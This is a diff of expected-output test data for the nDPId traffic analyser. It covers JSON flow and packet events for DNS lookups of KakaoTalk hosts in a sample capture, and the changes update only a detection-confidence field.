00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1430069022093,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":114,"pkt_l4_len":78,"thread_ts_msec":1430069022093,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGIb1QAANREBJgq8AQEKGFK8ADXlugBOjwdNe4GAAAEAAgAAAAAEaXRlbQVrYWthbwNjb20AAAEAAcAMAAUAAQAABdUACgRpdGVtAmdswBHALAABAAEAAADUAATSZ\/AP"} -00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022093,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069022093,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"item.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}} +00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022093,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069022093,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"item.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1430069022094,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":124,"pkt_l4_len":88,"thread_ts_msec":1430069022094,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGzteAAANREveAq8AQEKGFK8ADUybABYuHj3UYGAAAEAAgAAAAAEdXAtbQR0YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAD8wAPBHVwLW0EdGFsawJnbMAWwDEAAQABAAAAeAAE0mfwEA=="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022094,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022094,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-m.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}} 
+00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022094,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022094,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-m.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}} 00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1430069022094,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":130,"pkt_l4_len":94,"thread_ts_msec":1430069022094,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAHLteQAANREvcQq8AQEKGFK8ADWjtQBeT7D7RIGAAAEAAgAAAAAHYm9va2luZwRsb2NvBWtha2FvA2NvbQAAAQABwAwABQABAAAD8wASB2Jvb2tpbmcEbG9jbwJnbMAZwDQAAQABAAAAeAAEbkyOfQ=="} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022058,"flow_last_seen":1430069022094,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069022094,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"booking.loco.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.142.125"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022058,"flow_last_seen":1430069022094,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069022094,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"booking.loco.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.142.125"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022100,"flow_last_seen":1430069022100,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022100,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1430069022100,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069022100,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEBFykANQAtVi4l7AEAAAEAAAAAAAAEdXAtcAR0YWxrBWtha2FvA2NvbQAAAQAB"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022100,"flow_last_seen":1430069022100,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022100,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-p.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022100,"flow_last_seen":1430069022100,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022100,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": 
{"query":"up-p.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022104,"flow_last_seen":1430069022104,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022104,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1430069022104,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069022104,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEBI4YANQAt2SeQlQEAAAEAAAAAAAAEdXAtdgR0YWxrBWtha2FvA2NvbQAAAQAB"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022104,"flow_last_seen":1430069022104,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022104,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-v.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022104,"flow_last_seen":1430069022104,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022104,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-v.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022105,"flow_last_seen":1430069022105,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022105,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1430069022105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069022105,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEB3fQANQAtU9dudwEAAAEAAAAAAAAEdXAtYwR0YWxrBWtha2FvA2NvbQAAAQAB"} 
-00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022105,"flow_last_seen":1430069022105,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022105,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-c.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022105,"flow_last_seen":1430069022105,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022105,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-c.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1430069022234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":124,"pkt_l4_len":88,"thread_ts_msec":1430069022234,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGwb1gAANREBGwq8AQEKGFK8ADUXKQBYAAol7IGAAAEAAgAAAAAEdXAtcAR0YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAFlQAPBHVwLXAEdGFsawJnbMAWwDEAAQABAAAAiwAE0mfwEA=="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022100,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022234,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-p.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022100,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022234,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-p.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1430069022234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":124,"pkt_l4_len":88,"thread_ts_msec":1430069022234,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGwb1wAANREBGgq8AQEKGFK8ADUjhgBYgN2QlYGAAAEAAgAAAAAEdXAtdgR0YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAFlwAPBHVwLXYEdGFsawJnbMAWwDEAAQABAAAAqwAE0mfwEA=="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022104,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022234,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-v.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}} 
+00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022104,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022234,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-v.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1430069022234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":124,"pkt_l4_len":88,"thread_ts_msec":1430069022234,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGztegAANREvdgq8AQEKGFK8ADXd9ABYZqtud4GAAAEAAgAAAAAEdXAtYwR0YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAD8wAPBHVwLWMEdGFsawJnbMAWwDEAAQABAAAAeAAEbkyNVQ=="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022105,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022234,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-c.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.85"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022105,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069022234,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-c.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.85"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022249,"flow_last_seen":1430069022249,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022249,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1430069022249,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069022249,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEBcWUANQAtiQin1QEAAAEAAAAAAAAEdXAtYQR0YWxrBWtha2FvA2NvbQAAAQAB"} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022249,"flow_last_seen":1430069022249,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022249,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-a.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022249,"flow_last_seen":1430069022249,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069022249,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": 
{"query":"up-a.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022252,"flow_last_seen":1430069022252,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1430069022252,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1430069022252,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":82,"pkt_l4_len":46,"thread_ts_msec":1430069022252,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEIAAEAAQBHSGgoYUrwKvAEBYh0ANQAu\/udwlQEAAAEAAAAAAAAFdXAtZ3AEdGFsawVrYWthbwNjb20AAAEAAQ=="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022252,"flow_last_seen":1430069022252,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1430069022252,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": 
{"query":"up-gp.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022252,"flow_last_seen":1430069022252,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1430069022252,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": 